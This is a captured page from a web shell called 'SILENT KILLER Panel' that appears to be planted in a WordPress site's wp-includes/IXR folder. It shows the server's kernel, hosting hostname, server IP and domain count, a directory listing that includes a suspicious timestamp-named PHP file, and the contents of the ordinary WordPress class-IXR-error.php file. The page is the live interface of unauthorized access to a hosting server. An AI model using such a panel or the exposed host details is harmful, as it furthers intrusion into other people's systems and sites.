SILENT KILLERPanel

Current Path: > home > transcarter > public_html > wp-includes > IXR >


Operation   : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Software     : Apache
Server IP    : 198.54.126.42 | Your IP: 216.73.216.135
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/transcarter/public_html/wp-includes/IXR/

NameTypeSizeLast ModifiedActions
class-IXR-base64.php File 414 bytes August 26 2016 21:08:34.
class-IXR-client.php File 4787 bytes June 30 2020 18:50:04.
class-IXR-clientmulticall.php File 1263 bytes June 30 2020 18:50:04.
class-IXR-date.php File 1691 bytes May 25 2019 23:12:54.
class-IXR-error.php File 854 bytes August 26 2016 21:08:34.
class-IXR-introspectionserver.php File 5323 bytes August 26 2016 21:08:34.
class-IXR-message.php File 8196 bytes January 20 2023 01:36:10.
class-IXR-request.php File 927 bytes August 26 2016 21:08:34.
class-IXR-server.php File 6670 bytes May 24 2021 01:18:58.
class-IXR-value.php File 3790 bytes August 26 2016 21:08:34.
error_log File 10064 bytes August 06 2025 23:14:37.
home.1753438181.php File 824 bytes July 25 2025 10:09:45.

Reading File: /home/transcarter/public_html/wp-includes/IXR//class-IXR-error.php

<?php

/**
 * IXR_Error
 *
 * @package IXR
 * @since 1.5.0
 */
class IXR_Error
{
    var $code;
    var $message;

	/**
	 * PHP5 constructor.
	 */
    function __construct( $code, $message )
    {
        $this->code = $code;
        $this->message = htmlspecialchars($message);
    }

	/**
	 * PHP4 constructor.
	 */
	public function IXR_Error( $code, $message ) {
		self::__construct( $code, $message );
	}

    function getXml()
    {
        $xml = <<<EOD
<methodResponse>
  <fault>
    <value>
      <struct>
        <member>
          <name>faultCode</name>
          <value><int>{$this->code}</int></value>
        </member>
        <member>
          <name>faultString</name>
          <value><string>{$this->message}</string></value>
        </member>
      </struct>
    </value>
  </fault>
</methodResponse>

EOD;
        return $xml;
    }
}

SILENT KILLER Tool